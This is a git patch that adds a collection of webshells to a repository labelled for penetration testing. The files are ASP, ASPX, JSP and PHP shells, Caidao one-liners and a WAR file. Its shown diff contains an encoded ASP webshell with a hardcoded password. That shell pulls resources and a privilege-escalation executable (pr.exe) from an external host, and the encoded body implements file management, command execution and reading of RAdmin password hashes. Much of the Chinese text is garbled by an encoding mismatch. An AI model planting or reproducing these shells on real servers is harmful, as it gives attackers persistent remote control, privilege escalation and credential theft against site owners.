From 733618bc2af552af93c626821974769f0ea503d5 Mon Sep 17 00:00:00 2001
From: tennc <tennc@126.com>
Date: Fri, 24 May 2013 08:23:49 +0800
Subject: [PATCH] update webshell Penetration testing2013 beta

---
 asp/ice.asp                        |   19 +
 asp/vps提权马.asp                  | 1295 +++++++++++
 asp/不灭之魂.asp                   | 1355 ++++++++++++
 aspx/icesword.aspx                 | 2578 ++++++++++++++++++++++
 caidao-shell/404.php               |    1 +
 caidao-shell/aspx.jpg              |  Bin 0 -> 9976 bytes
 caidao-shell/download 下载文件.asp |   11 +
 caidao-shell/fuck.php              |    1 +
 caidao-shell/guo.php               |    1 +
 caidao-shell/hkmjj.asp             |   22 +
 caidao-shell/ice.asp               |    2 +
 caidao-shell/ice.aspx              |    2 +
 caidao-shell/ice.cfm               |   27 +
 caidao-shell/ice.jpg               |  Bin 0 -> 9023 bytes
 caidao-shell/ice.jsp               |   59 +
 caidao-shell/ice.php               |    1 +
 caidao-shell/mdb.asp               |  Bin 0 -> 233472 bytes
 caidao-shell/php.jpg               |  Bin 0 -> 8039 bytes
 caidao-shell/说明.log              |   86 +
 jsp/icesword.jsp                   | 1808 +++++++++++++++
 jsp/suiyue.jsp                     |  993 +++++++++
 jsp/t00ls.jsp                      | 3294 ++++++++++++++++++++++++++++
 other/icesword.war                 |  Bin 0 -> 11470 bytes
 php/404.php                        |   38 +
 php/icesword.php                   | 2720 +++++++++++++++++++++++
 php/itsec.php                      | 1284 +++++++++++
 php/silic.php                      | 2210 +++++++++++++++++++
 php/spy.php                        | 2136 ++++++++++++++++++
 28 files changed, 19943 insertions(+)
 create mode 100644 asp/ice.asp
 create mode 100644 asp/vps提权马.asp
 create mode 100644 asp/不灭之魂.asp
 create mode 100644 aspx/icesword.aspx
 create mode 100644 caidao-shell/404.php
 create mode 100644 caidao-shell/aspx.jpg
 create mode 100644 caidao-shell/download 下载文件.asp
 create mode 100644 caidao-shell/fuck.php
 create mode 100644 caidao-shell/guo.php
 create mode 100644 caidao-shell/hkmjj.asp
 create mode 100644 caidao-shell/ice.asp
 create mode 100644 caidao-shell/ice.aspx
 create mode 100644 caidao-shell/ice.cfm
 create mode 100644 caidao-shell/ice.jpg
 create mode 100644 caidao-shell/ice.jsp
 create mode 100644 caidao-shell/ice.php
 create mode 100644 caidao-shell/mdb.asp
 create mode 100644 caidao-shell/php.jpg
 create mode 100644 caidao-shell/说明.log
 create mode 100644 jsp/icesword.jsp
 create mode 100644 jsp/suiyue.jsp
 create mode 100644 jsp/t00ls.jsp
 create mode 100644 other/icesword.war
 create mode 100644 php/404.php
 create mode 100644 php/icesword.php
 create mode 100644 php/itsec.php
 create mode 100644 php/silic.php
 create mode 100644 php/spy.php

diff --git a/asp/ice.asp b/asp/ice.asp
new file mode 100644
index 0000000..563cc91
--- /dev/null
+++ b/asp/ice.asp
@@ -0,0 +1,19 @@
+<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
+<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
+<%@ LANGUAGE = VBScript.encode%><%
+Server.ScriptTimeout=999999999
+UserPass="icesword"'      	  		 	
+clientPassword="whoamI"'				
+mNametitle="����ʹ"'  	 		 	
+Copyright="��������ʹ"'				
+SItEuRl="HTTP://baidu.com/"'			
+bs=false'					
+ShowFileIco=true'                              	
+IcoPath="http://lpl38.com/web/FileType/"'	
+htp="http://lpl38.com/web/"'		
+durl="http://lpl38.com/web/pr.exe"'		
+aspxt="http://lpl38.com/web/aspx.txt"'	
+phpt="http://lpl38.com/web/php.txt"'	
+#@~^CHEBAA==]/2Kxk+R~E6W+MPxYMEn@#@&rx,3DMWD,]n/!:PH+aO,@#@&/D.AzfxE@!/m.raY~VmUTECT+{\4kmMrwDP.E	lOxk+D7nD@*J@#@&dOD~bG'dY.$zf'J&WP"+5;/YcErJ'm^rxOhlk/hKD9'JrJb@!@*JEErPK4nx,?+kdrW	`rJ:JEb{In;!n/D`EEr[msrxOnmdkhGMNLJJr#r'.(1nhdkUn@#@&/D.Azf'kO.AzfLJ(0~j/dkKU`rJ:Er#@!@*ErJEP:4x~A6mED+vj+k/rW	`EE[JJ*bJ@#@&/D.$bG'kY.A)9LJ@!zk^DbwO@*rd@#@&/KxdY,9A0[{Jr@#@&kE(~?4WA2MDcb@#@&P,(0,2DM~Ptx@#@&%J@!8M@*@!l,4D0xvNl\Cd1DrwDl4kdDWMXR(l1V`*B@*@!(D@*~rP[,3DMRfd^DbwDkGx~',J@!zm@*@!(D@*E@#@&2..cZs+m.=InkwKx/RwsEkt@#@&,P3U9Pq6@#@&xN,d;4@#@&UE8P%ckY.#@#@&D/2G	/+ AMkO+vdDDb@#@&AxN,?!8@#@&s;x1YrG	PIKlDt`Ub@#@&,P"+KlO4{Inw^Cm`jSr-JSE'-E#@#@&Ax[,s!xmDkKU@#@&s;x1YrG	PI"nnmYtvjb@#@&P,I]+KCDtxI2VmmncU~Jwwr~E-rb@#@&3	N,sE	mDrW	@#@&j"Sx];EdYc?+M-nDjlMkC4snk`Ej"JJ*@#@&6}rrx];;+kOc?nM\D.mDbC4^+d`rn)P_{K")1USb:39J*@#@&?nD-nMqK'"n;!+dOc?+.-D#lMrm4s/vJS}ZzJ{zf9Ir#@#@&zmYbGx{I+$;n/D`rb^YrG	Jb@#@&]WKYKCDt'jnM\nDc\mwKmY4`JcJ*@#@&q	IKWOxU+D7nDcHlaKCY4`rzE#@#@&wWsN.nmY4x"+;;nkYcJwG^NnMnmYtr#@#@&/D-+MEx];EdYc?+M-nDjlMkC4snk`EtDOw|tGdDJ#@#@&k+.\.a';k+Mwlk/@#@&sglh+{In5!+/DcJw1lsnE#@#@&wEUmOrKx~?4r?mxo;	`?4rUlUr(%kY.*@#@&?tb?mUr(LdYMPx~"+w^Cm`?4rjl	r(LdY.S,J��E~,EJrJb@#@&sW.~Utr?mU&Px,F,KW,SU`Utr?mx68N/YMb@#@&Pq6~\k9`Utr?CU}4%/D.~,?4rUlx(S,FbP@!@*,J��E,K4+x@#@&U4kUlU1hjOMP',\k9`?4rjl	r(LdY.S,?4kUCx&~~q*P_~j4kjl	HhjDD@#@&PAVkn@#@&?4kUlUHh?D.P{P\(/.S6P3PjtrjmxH+SjYM@#@&~AxN~(6@#@&1aD@#@&Utb?l	s!UP{Pjtb?CUg+hUOD@#@&2	[~s!x1YrWU@#@&m[6{E@!DD@*@!DNPr[{N~hb[DtxO*,WxtW!d+}\nD{JEO4k/cdYHV+c8Cm0oMW;x[/KVGD{vaZ!fZ!BEE,WUHK;k+6!Y{JJDtbdRkYzVR8C13oMGE	NZKsGD{B[!T&TTZBEJ@*E)16[xr@!0GUDPWl1n{BAbxTNk	okv@*R@!&0KxO@*r)+6xJ@!zl@*@!&Y9@*@!zOD@*E@#@&d+D~0kWxdD\n.cZ.+mOr8N+1Y`r?1.kaYrxTRor^+?HdY:r(%nmDJ*@#@&/nO,0dWox/D-nMRZ.nmYnr(%mOvJUmDbwDrxTRok^+jzkY+s64N+mDEb@#@&/DDq'E4DY2)J&JLIn5!+/O U+.\.jl.bl(V+k`rj2".3I|1ChJ#L~V0Yv]n;!+kY ?n.7+..m.km4snk`Ji]dJb~&UkY."+7`I;!n/DRj+M\n.jlDbC4^+/vEiIdJ*~EzEb*)$l1VjMVxE@!4D@*@!(D@*@!1n	YnM@*@!lP4DW'ELC\m/^.bwY=4kkYWMz 4mm0`bB@*����@!Jl@*@!J^+	Yn.@*J@#@&%r@!4Yss@*@!hYmPtDYaR+$Er\{JE/KxYUY KXanEJ,mKxO+UO{JEYaYJtOh^iP^4mDd+DxT4+2FyJJ@*@!DrY^+@*JL:HCs+YbOV[J,R~JL?D-+.(h[EP@!&YbYsn@*@!/Oz^+~YH2'ErY6YJmkdJr@*8W9XSOM~Y9`:mDobURYKw=*26I8mmVoMGE	NR^KVW.l[!T!ZTZi^KVKD)[&2osZ!I0KxORkkylFyw6pj/I}SdA)IRozZ3O;6S}Il:Z!!TTZidmMG^V8mD lDMWSRmKVGD=affws!ZI/1DW^s8lMO4kLtsrTtOO1GVKDl:Z!vfTZidmMG^V8mD &N^kT4Y mGVKDl:2&swT!p/mMGsV(lMOdtC[KhRmKsWM):f2ssTT)Rd4P^!DdKD=tl	N)rxaEO~k+sn1Y~Dn6DlDC`4KD9+.OOGaOAk9Ot=F2ap0WUO hnkT4D)~(W^Ni(WM[+MOs+6YRAbNY4lP8w6pWGxDOkk"+lq8wai(GD9+.R^+0OR1WsWMl,af2sw!!p4m^3TDGE	Nl~[!!ZT!Zi4K.[+MO(WOYGh hrND4),F2ap4W.[DR4KODWh mKVWM),:&2so!Zi^G^WD=~a2&swTTi(WMNnDROKwRmKsWM)~:2&soTZiWW	O 0Csk^X),\.NmxCi(W.[DOMro4YOSr[Y4),F26I8KD[+MRDbo4O mWsGM)~a2fwsTZi)aNP4m^3TDGE	Nl~[!!2T!Ziwm[[k	o Vn0OllwaiaCN9kUL DkL4D)XwXNaDnP0KxY /b"+=PqFa6IWKxY WlskVHl~\D9lUlI^KVGD=~a2&ooZ!iN4M	^W^GM)~[&2ssZ!p8l13LDKEU[ mW^GD=Pa2fosZ!ptnkL4D)~*aai)aa`6WxOR6lhk^z=P-D9lxmi6GxDOdk.+lq2w6)C	1WVK.la2&wsT!IO6OO9nmKDCObWxlUKxni) m:`1W^WD=amClp0GxDOdr.+)8qwXi8@!&dYHV@*E@#@&r6P8/{OD!+~O4+xl%r@!dmMraY~kD1'JLtD2[rF Lk@*ElV/lLr@!/1.rwD@*r)nx[~b0lLrWE	mOrKxPVr^V3DMGM/c*	M+Y!D	~YMEni)hrU9WhcGxDDK.x3bV^2.DG.kiWE	^YbWU~H+/GVv#`k6~vmG	0bD:vJrȷ��Ҫִ�д˲�����EJ*#.+DE.U,YD!niV/~.+DEMx~0Csk+I86;x1YrG	PD;U;VGm0c*	O4+:k:P{~hbx[WSRdnDKksnW!Y`rE.E	Z^W^3cbrJSP8T!*i-CMPYG[mX~',Uh~GlD+`*i7CD,Nr/aVCz{PYK[lHRYKJGmmV?ODrUT`biSrx9WA kYlO;k'EJ��r';W2HDbotD[r~P OEJ3NrdaVlHI8MEx;sGm0`*iWEU^DkGx,jtKhoG^N+.cwWsN.*	OKwclN9D6GDsRoW^Nn.hlY4 \mVE~xPwW^NnDIOKw l9[D6W.hc/E8hbYc#pN6EU1YbWx,s!sVwW.:vsHCs+~w)mDkW	b`YKwctrNnWKDhRwHls+ -mVEn~{Po1mhir6`wbmDkKU'{JEZKwzobV+rE#Pf1mhnP{PaDG:2OvJE�����븴�Ƶ�Ŀ���ļ�ȫ����JrSsglhn*iYG2ctrNWKDhcsgl:R7CV!+~_{PEE-uu-EJ3f1mhni)+^/nPrWvs)mDrW	'xErHW-nwks+rE*	9gls+P{Pa.WswO`rJ�������ƶ���Ŀ���ļ�ȫ����EEBs1mh+*iYK2 tbN0GDh w1C: \mV;n,_'~Eruku-Er_9gls+i)+^d+,kW`wb^ObWx{xJrZWazoW^NDEJb`G1C:~',w.GswYcEr�������ƶ���Ŀ���ļ���ȫ����JE~wHm:n*iDWwctb[+6W.:csHCs+R7CV!+P3x~Jru-ukJEQG1C:I8Vdn,k0cozmOkKU{'ErHK\+wW^[+MJE#PfHCs+P{~wMW:aOcJr�������ƶ���Ŀ���ļ���ȫ����Jr~o1Ch#IYK2R4k[n6WDh w1C: 7ls!+,_',Jrku-uEJ3fHCs+i)nVk+PbWcszmDkGxxxrJH+SoW^Nn.rJ#`9glh+,x,w.K:aY`rJ������Ҫ�½����ļ���ȫ����rE~w1C:#IOKwR4rN0WMh sgls+ \Cs!+~',91m:nI)+VdnPfHlsn,'~rJ}YtDrEi)kW`G1Ch"'	;V^#	DG2R4k9+WW.hcb^YbGxc\Cs!+Px~wb^YbG	iOKwctk9+6GDsRdE(:rOv#i)nVk+	DG2R4k9+WW.hcsHlsnR7ls;P'~ErJEi)N@!zd1DbwY@*J@#@&Lr@!8W9XE~=q0,)mDkW	xEJ,Y4+UP%~rPdmMGV^'UGr)L~E@*J@#@&GrsP6(KvF%B *ls	')mDkGU=r4:c!B!#,x~JUmMk2YrUTRok^n?H/Onsr4%n1YE)}8:`TB *P',J��,��~��P��,��P��E)}4Pc8~!*~',Jhk^.kaYc/4+ssr)64:cFB b~{PJ������ִ�����S��ʾv@!0GxD~1WsKD{D+9@*��@!&0KxO@*Eʱ��@!C~4D+6xBQbmDrGx{msNaB~OmDL+DxBwksnwDlhnE@*~@!6G	Y~1W^WD{D[@*,ִ��ZhN��@!zWG	Y@*@!&l@*P�˹���ִ��J=68Kv B!bPx~rb9ro ZmYCsKoJl6(Kc B+*Px,JzZZA?U~��P��,��P��E)}4Pc2~!*~',J9"6 9YAxLkUnr)64:c&B b~{PJ)/;2j?,ѹ~��,��P��E=r(K`W~ZbP{PE?1Dr2DkxT fbmYbGUlMXr)64PcW~+#,xPr������P��~��~����,���J)68:`X~Zb,'~rb9WN(R1Gx	+^YbWUE=r4:c*B #,x~J���ݿ�,����P���r)64Pc+~T#,xPrb[G94RjOM+C:rl}4PvvB #,',E������P�ϴ�,���Jlr(Kc{B!#,xPr?W6O)DDkklU/ obVnjaE)}4PcF~ b~{PE?zRwksjaP�ļ�P�ϴ�,���J=64:`0~Z#~x,JSHWjaVWm[ jaVKl[srsJlr(P`R~+b,'PE���Ʒ�~�ļ�,�ϴ�P���E)}8:`1B!*P',JhnDkkO/cj2sKlNcqJ=r4:c1~y#,'~J)jhj2VKCN,�ļ�P�ϴ�~���E=r4Pc8!S!*~{PExHmkVc?sOwtlrVr)68:`FZS *P',EBHmk^P�ʼ�~�շ�P���El}4P`8q~Z#~x,JZ96gKjRgnSHCbVr)r(KvqFB bP{PE����jtKn,����~���J=r4:cq B!*PxPEjsY2HmrVc?hOaHlrscFE)}8:`qy~y#P{Prj:Dw\lbV~����~���r)r(P`8&~Zb~',Jtk^DGdK0ORo\S_KPKr)r8PvFf~yb,'~r����P����,���J@#@&r(P`8cS!*Px~rh/r'J1DkaO /4+^V FEl,P6ADcFW~+b,'PE���Akt���������Ը���������E)}$:`ql~Z#P{Pr	?r[EZ"qKPc12:	r"|J=~~r~YvFX~+b,'~J�鿴��������Ϣ���������ʱ����������Ȩrlr~Kcq+~!b~{PE/4nr[E^VclwaVr'JbmCYbWUE=rADcF+~ *~xPr/4+E[Es^RCwaskr[E^mYkGU,��������sjrʱ�����ļ��Լ�ִ������rl}APvFF~!*P{~JktE[r+ssclwasJLJk1COkKxcFE)6$D`qGB+#,'~Ekt+E'rVsRm2aVrr[rmlDkKUP�ı�������w?6ʱ�����ļ��Լ�ִ������J=r$PvF%BT#,'Prj4+^Vcjd+.dr)6ADcFR~+b,'PEɾ����UY +Xn,xnDFc+6������������û������J@#@&sKD~k{!~PKPFRl?YP:xj+M\D Z.nmYnr(%+1Yc6(K`rSZ#b)&W,O+8cF  8!ZXP@!@*~2MD~P4+x=(/}4L{E~��J=2^/n)(d}4%'r~��J=2..cZVnCM)3x9~&0lU+DPK{1KOtbxL)}4Pcb~F*xqkr4NlH+XY=qWPoG^NnDhCY4@!@*ErPY4n	)j+kdbWUvJwWV9+MKlDtE#{I]nhlY4csKVN.KlDt*)3x[~&0lq6~?/drKx`EoKV[+MKmY4r#{JJ,K4nx=sGV9+.KmYt{	hSIWKOl?/kkGxcEwWsN.nmY4E*'sGs9+.nmO4)3	N,k0@#@&@#@&@#@&@#@&s!x^ObWx,KmzxXS4nDcv#@#@&%E@!Nr\,CVboUxEm+UODv@*h^zxzStD+��Ȩ,AbU�汾@!JNr\@*@!WGM:P	C:'BXWGDsB,:nY4G9'vwKdYE@*@!Om4Vn~Sk[Y4xE%TuB(WD9+MxBZB@*@!DD@*@!DNPSrNDt'EqT]E@*1kW�ļ�)~@!JY[@*@!ON,hr[Dt'vqZ]v@*@!r	w;DP	l:'E2lDtvPDX2n{BYaYEP\ms;+{B;)wfG^!:nxDdPmx[~U+YOr	od-zs^Pik+M/-zwask1lOkKx~9mYl'w?H:l	Onm'w1bUXA4Dn-;rY:2scmkWv,/ryxE%TE@*@!zY9@*@!ON@*@!rxaEO~DXwxBkE4srOB,\mV;+xv,�ύPv@*@!&Y9@*@!&Dl4sn@*J@#@&U9Po!x1YkKx@#@&Lr@!&0KDh@*@!/mMrwD@*0!U^YbW	P]jHG	msk1V`*	[G1E:nUDRa0K.sR^4k	lR	lsnP{P2lM+UOcwh9 \mVEI[W1Es+UY a6W.:cCmDkGU,'P2CM+UYc;MV 7l^E+pNK^Es+UYc6WGM:Rk;4skYvbI8@!zkm.k2O@*J@#@&w;x1YrG	P?O.lhSKC9s.K:wkV`kKlDtb@#@&frh,W?D.+m:@#@&jnY,WUY.+Ch,'~?.\D /M+lOn}4%+1OvJ)9W94RUYMnlsJb@#@&rO4PWUODl:@#@& KHwPxPq@#@&R\W9nP{Pf@#@&Rr2n	@#@&RdGmNoMWssk^+vdnmY4#@#@& KK/kDrW	P',T@#@&UYM+C:JGmNoDKhsbVn~{PR]nmN@#@&c/^Wd@#@&2x9PqrY4@#@&?Y~GUYDC:,'PgGOtbxT@#@&2U[,s;x1OkKx@#@&wEx^ObWUP4nXNn1`kYDbx*~@#@&fr:,kS~N~P0SPM+/!sOP@#@&M+dEsO,'~!,@#@&wW.~bP'~q,KGPdn	`dDDbx#,@#@&(0,HrNv/O.bx~,r~,F#,x~J6J,r.P\r9`dYMrxBPrS,F#~xrsEP:4x~@#@&,LP{P8XP@#@&3x9P(W,@#@&&WPtkNvdODbxBPr~~q*PxPrnJ,r.~tkNcdDDrxB~b~~8#,'Pr2r~K4+UP@#@&~%,'P8*P@#@&2	[~q6P@#@&(0~\bNc/D.k	~~rBPFb~{PENr~}D~tk9`/DDbU~,kSP8#~x,Jfr~K4+x,@#@&PNP{Pq&~@#@&2UN,(0,@#@&(6PHr[v/ODbUBPrBP8#P{Pr^J,r.Ptk[ckYDbU~,k~,qbP{PrZEPP4x~@#@&~L,'~qyP@#@&3	N~q6~@#@&(6PtkNv/D.k	~~kBPqb,'Pr8J,rD,\rNv/DDrxS~b~~F*~',J$E,KtnU,@#@&PN~{Pq8P@#@&2	N,(0,@#@&q6P\r9`/D.k	~PbS~F*P{PElE~}D~Hb[`kY.r	~PrS,FbP{~rbE,K4+x,@#@&~L,'~FZP@#@&AxN,(0,@#@&&W~HbNv/ODrUBPr~,q#,@!x~r,J~)	N~Hb[v/OMk	~Pb~,q#,@*xPr!E~:t+	~@#@&PL,x~Z&xD`\k[ckY.k	SPb~~q*#P@#@&Ax[P&W,@#@&wWMP3,',qP:W~SxcdDDk	bP Pk,@#@&PNP{P%PM~8v~@#@&H+XY~@#@&D+d;^Y~',./;^Y,_PNP@#@&16OP@#@&4nXN+1~',D+k;sY,@#@&2UN~o!x^YbGx,@#@&o!xmOrKx~n1)	XA4+M+`9lDC~sW[+*@#@&uz?C{~HbN`9COlB&*@#@&qW~sW[+,xPrwCdkJPP4x~x!h(+.,',& =P;r0	EhP{Pq*W@#@&&WPsWN~xPrEk+.J~P4+UP	;:(+.~{P&Tl,Zr0	;sPx,Fl@#@&wWM~k,'~F,KG~	E:(nD,?Y2~ ,@#@&w^/O.{`ctaNmc\bN`[CDlSkB+*#~XWMPt69nmvHrNvtCd4~kB+#*#PXG.P;k6x;:b@#@&qWPvcw1/O.,@!'~fy#~rM~vw^kYM@*FyG*bP:tnx,2arDPsK.P@#@&N^GNP{P[+^G9+~_,/tM`2^kYDb@#@&Zr0	;s'/b0	E:3F@#@&16OP@#@&K^zxXS4+M+'9n^W9+@#@&3x[~6EUmDrW	@#@&o!xmOrKx~4bUytnX`(kxkYMb@#@&sGD,k~x,FP:GPd+x~c8k	/DDb@#@&46dYM~',Cnavb/^$vHrN~c(kUkYM~Pb~,q#*#@#@&&0~Jx`4n6kYD*xqP:tx~@#@&8bx+ta'(kU+4+6'EZJ'`d/m/nvt6/DD*b@#@&2s/@#@&8bx 4n6{4k	+4+X[,S/ldnvtn6kOD*@#@&3	NP(W,@#@&1aD@#@&Ax9Ps!x1OkKx@#@&;qo~{PI5E/YvE2lDtr#@#@&(W,Z(s,@!@*,JE~:t+U~@#@&$k	jDDxUYM+lsSKCNwDG:wksnvZqwbP@#@&LrK^l	XStnDn~"+CN.P{'@*@!(D@*@!8M@*Kb:u=J';qw[J@!4M@*�ʺ�)r[KmzxzA4+D~`tkNv8rxyt6cArUUY.#B1FO~**~J;dDE#@#@&NJ@!(D@*����)JLn1)xHh4+M+~ctkNv8k	 tacAbxUY.#Sq8G{~2+#BJ2Ck/Jb@#@&2UN,(6P@#@&s!xmDkKUPMl[:bxcb@#@&?OPq?C{~j+M\D Z.nmYnr(%+1YcEq?Z](hK ?_3dSE*@#@&Il9:bUnmY4'rCF3I{S}/bd{Hz/uqg2'?e?P3t-]b9hk	--+c!-jnM\nD'KmDCs+D+Dk-r@#@&hl.ls+OnM'JhCDm:+Dn.J@#@&hW.Y~x,JKWMOJ@#@&%E@!4D@*ע��l����_bjCֵ����"C9:r	Cm/t���߻�KN�������ӣ��������ص�ַ=E[4Y2[r/GWDzIm[:bx{4CdtcDmD@!4.@*@!4.@*r@#@&hl.Cs+Yn.zD.lHxq?ucIAMIAbGcImNhk	nCO4P[,KlMl:OnD,#@#@&%PKCMlh+DnDLJlE@#@&qW~&/)DMCH`KmDm:+D+M)DMlz#,K4n	@#@&wGD,kP{~TP:W,j$W;U9`KlMC:Yn.zDDCz*@#@&q6~,Sn	Pvt+X`hCDm:nYD).MlXvr#*#'8~Ptx,@#@&/O.}4%P{~/DD68NP[~EZJ'ZUOM`u6vnlMlsnYD)DMlzcb##*@#@&AV/@#@&/DD}4%Px~kY.r(%PLPunX`nC.m:nY.zD.mXvk#*@#@&3x9P(0,@#@&H6Y@#@&L,/YMG8L@#@&AVd+@#@&NJ3DMGDeP/C	BY~]l["r@#@&2U9P&0@#@&Lr@!4M@*@!4M@*E@#@&nWMObMDlHx	?_R"2!I3)G`]l9hk	nCO4P[~KKDOP*@#@&qW,qkbDMlHcnKDObMDCz*PK4nx,@#@&N~KWMY,[E)E~@#@&%P4n6DWrUD+Dc/UY.`_nX`KKDDbDMlHcF*#b[;?O.vC+XcnKDYz..lH`Z#b#b@#@&2s/~@#@&LE3MDW.Z,ZCxEO,InmNeJ@#@&2	[P&0@#@&Ax[~wEx1OkKx@#@&o;x1YbWUP4nXYGk	O+M`dOMkxb~@#@&9ks~b~~N~,3~,DdE^Y~@#@&Dnd!VY,xPZP@#@&oGD,k,'~F~PKPJ+	c/DDrU*P@#@&(6P\k9ckY.bxBPkBP8bP{PE0rP6.,Hk9c/DDk	S~kBP8#~'EorPPtUP@#@&%~{PFX~@#@&3x9~&0~@#@&&0Ptk9c/DDrxBPrS,F#,xPr+J,6.Ptk9`dY.r	~~kB~F*Px~r2J~P4+UP@#@&NPx,FWP@#@&2	[P&0~@#@&qW~tkNvdYMkxB~r~,F*PxPE[rP6D,\k9`dOMkxS~b~~F*~{PEGJ,Ktx,@#@&NPxP8&~@#@&2x9~q6P@#@&(WPtk9`dY.r	~~kB~F*Px~rmJ~6MP\k9ckY.bxBPkBP8bP{PEZrPP4xP@#@&L,'P8+~@#@&2	N~qW~@#@&(0,\k9`dOMkxS~b~~F*~{PE(J,rD,Hb[`kY.k	~~rBPF*~',JAr~Ptx,@#@&L~x,FqP@#@&2	N~(6P@#@&(6P\k9ckY.bxBPkBP8bP{PElrP6.,Hk9c/DDk	S~kBP8#~'~EzJ~K4nx,@#@&%,'PqT,@#@&2	[,qW,@#@&q0,Hb[`kY.k	~~rBPF*~@!{PJOE~b	N,HrNcdDDrxB~kBPqb,@*'~EZJ~K4n	P@#@&L,'P;q	O`tk[`kY.r	~PbSP8##,@#@&2	N,qWP@#@&wW.P0~',F~PKPSnUv/ODbU*PR,k,@#@&NP{~L,e~F+P@#@&g+6D~@#@&D+k;sY,',Dn/;sDPQPN~@#@&1naDP@#@&46OWbUD+.,',D+kE^OP@#@&3x9Po;	mYbGx=sE	^OkKx,HCkUoKDh`*@#@&6n^!Y+cd4kdl	W!xcr���@*V4mYJ@!@*MY&@!@*NO&@!@*+sCD6kz@!@*vFE'M+[DG8:CD6~Bu!TqE'Y4Lb+4PEYZ!qE'4YNbh,v+^koFSW4j{xWbOmzgB{^./,B:CDon^koB{n:mx~nslDWr@!@*[Y@!@*9Y&@!@*:lM0b&@!@*BTB{Dn[MW4hlM0PEYX,E'DtLkn4,BY!ZqB{tO[bhPv;	+\xbCt'UKkDmbQB{^DkPvY6+Jv{+:mUP:lMWr@!@*BZGqBx4DNrh,[Y@!@*.O@!@*DO&@!@*[YJ@!@*+s(lDz@!@*:MG0J@!@*DDz@!@*9Yz@!��%)6kP9Un)��0W��{#��;NrC(��`UWbd//lb!D+-./'��'	rm:G9gJV/J4AzsW^RR&s2^zz=2YDt��`LCwaYDtO+L'��=¼����E[km8ia/8ULiwd8	[Iwk8	[Ia/(x[pwk8xL��LlxtO~��0W��P@*@!P*��ENbC8��`	Wb/d+d~6kl��@*m@!������D/;s^b��#Tqv@*v#�������'wkDnkj,VVz-'do	kOY?~[	lPkOx:E1G9-');���`.+[sKsAW4j)Dwr.1/l-CNBx0.4Phm'k/l^m,C@!,P~@*m@!��n.thHUb1w��#Oc@*B*���+M+4hzUzm2-'^+DxChH?-wCDl9P	GbYC1k^wwz-'qU/;V^lww8U+s;mKN-'l^���`M+9VGsAG4?lYarD1/C-mLBxWD4PsC{/dmV1Pl@!iad4	[Iwk4U'pw/(U[@*l@!���м���^n.w��*%v@*v#���snMww-=^���`M+[sKshG4U)Owb.1/C7lNB'6+M4Pslx/kls^,l@!@*C@!��^;/k\��bGv@*E#���w-.n7Dn?,JpUPOWK/W.^bHw-kn^ko,:mDoKDhw-=Z���cDNsGwhW4j)DwkM^dl7lNBx0n.4Phl{d/mV^~,l@!I2k4U[p2k4ULia/4	[p2/(x'ia/8ULiwk8xL@*l@!��Kun��*vv@*v#���24a-w);���cDNsGwhW4j=Y2kM^kl-mLE'0D4~:m'd/mV^~m@!iad4	[iad8xL@*m@!��j69gq	��#lc@*E#���j	}f1(	'-lZ���v.NsKsSWtU)D2kMmdl7l%v{0+M4Psl'kdCV1Pm@!Iwd8	[@*l@!��b vj-.?��#*c@*Bb���j7.?w'/VkwPsCDTW.n'-l/���vD+9sWwhW4jlYakMmdl-CNBx0.t,:Cxk/ls^,PC@!@*C@!��#qvj7D+U��#2c@*E#���hW1ROWK?W	rt"--knskwPsl.oG.h-w);���cDNsGwhW4j=Y2kM^kl-mLE'0D4~:m'd/mV^~m@!iad4	[iad8xLia/8x'Ia/8xL@*l@!��n\3:��# cIa/8xLIa/8	[@*B#���a:P-'?	rG1(	'-);���cDNVKoAW4?=Y2k.^kl-lNv'6+.4,:lxdklsm,C@!@*C@!��4!w:S��#8c@*E#���8Ea:Aw')Z���v.+9VWwAGtU)DwrD^dm\CLEx0D4~sl'ddmV^Pm@!@*D8@!��L=0k,N	n)��0W��x#��kIK��c	Wkkd+k)��@*Thrz@!@*��LE.+-./'��'	rlsW[_JDw��'2Dt'��'1.kPLsk@!iwk4	'��L=xntDP��VG��,@*@!,b��/"n��`	Gr/k+kPWkl��@*m@!��b-=n`"2J/IZ2]��bZFc@*Eb���M+s1X1+D'-=n���`M+[VKsAG4?)D2kMm/m-CLE'6+.t~hm'd/msm,l@!@*m@!��#wl9`]2d/IZ3"��#O`@*E#���MnV1X^+M-wlG���`D[VKshK4j)DwbD^/C-mLv'6nD4PhC{//Cs1PC@!@*C@!��#w=ZvI2dZI/2"��#0`@*Bb���.VmH^+M--=/���cDN^WohG4U)Owb.mkl-CNB'WnMt~:mxk/C^m,l@!@*l@!����m�̡�#F`@*B*���-w���w'���ˡ�ʼ����--k.+kjP^s)-'/TxrYOnUP[xm~/Dxnh!mW9w')/���`Mn9VGwhKt?=YarD1/C\mLvx6+D4~:m'/kCsm,l@!@*C@!���β�mʼ�_��b+`@*B*���w-���ˡ�ʼ����'-d./j~s^bw-kL	kOD+UPN	l,dY	+hE1W9w')Z���v.+9VWwAGtU)DwrD^dm\CLEx0D4~sl'ddmV^Pm@!@*l@!��kD/j|V^)��#l`@*B*���-wdM+/`~V^b-'dLxbYD+jP[UmPdY	n:!mG9'-)/���cM+[VKoSW4U)DwkMmkC\mLv'6+.4,:l{d/mVm,C@!@*m@!��kYU+h;1W9��#Wc@*E#���dO	+:;^Kfw-k./i,V^b-'/TUkDYn?,NUC,/Y	n:!mWGww);���`M+[VGoSW4?=OwbD^dm\l%v{0nD4~slxk/mVm,l@!@*l@!��2hlMoG.h��#&v@*B*���/+^roPslMoGDKw')n���`MnN^WoAKt?lOak.mkC7l%E'6+D4PsC'k/CV1PC@!@*l@!��GhlMoWMK��b v@*E#���d+srwPhlMLWMnww=N���`.n9VGsSG4?lDwbDmkl7CLE'W+Mt~hm'/kCV1Pl@!@*C@!��slMoGDK��b8`@*B*���d+^ko~slDLGMnw-=/���vDn9VKshKtUlYak.mkl-CNB'6nD4P:mxd/mV1PC@!@*.D@!@*+sCD6k&@!@*BFvxM+[DK8:CM0,B]Z!8v'DtLkt~vu!!8v'4YNbA~BVbsqhG4U'UWbOmzgvx1D/~v:CDwn^koE':l	PhlM0r@!@*NO@!@*B W+cyca=[UEKDT3^l8v{+sXDdP8'4O9kh~[D@!@*ND&@!@*2J@!@*lz@!@*(&@!ʾ��@*4@!@*[axWDt,���vB{Xl^2dk9RVzYd *BsYEcN&X$O	+:nsAYnocO	+h!mKN���'0mbsm	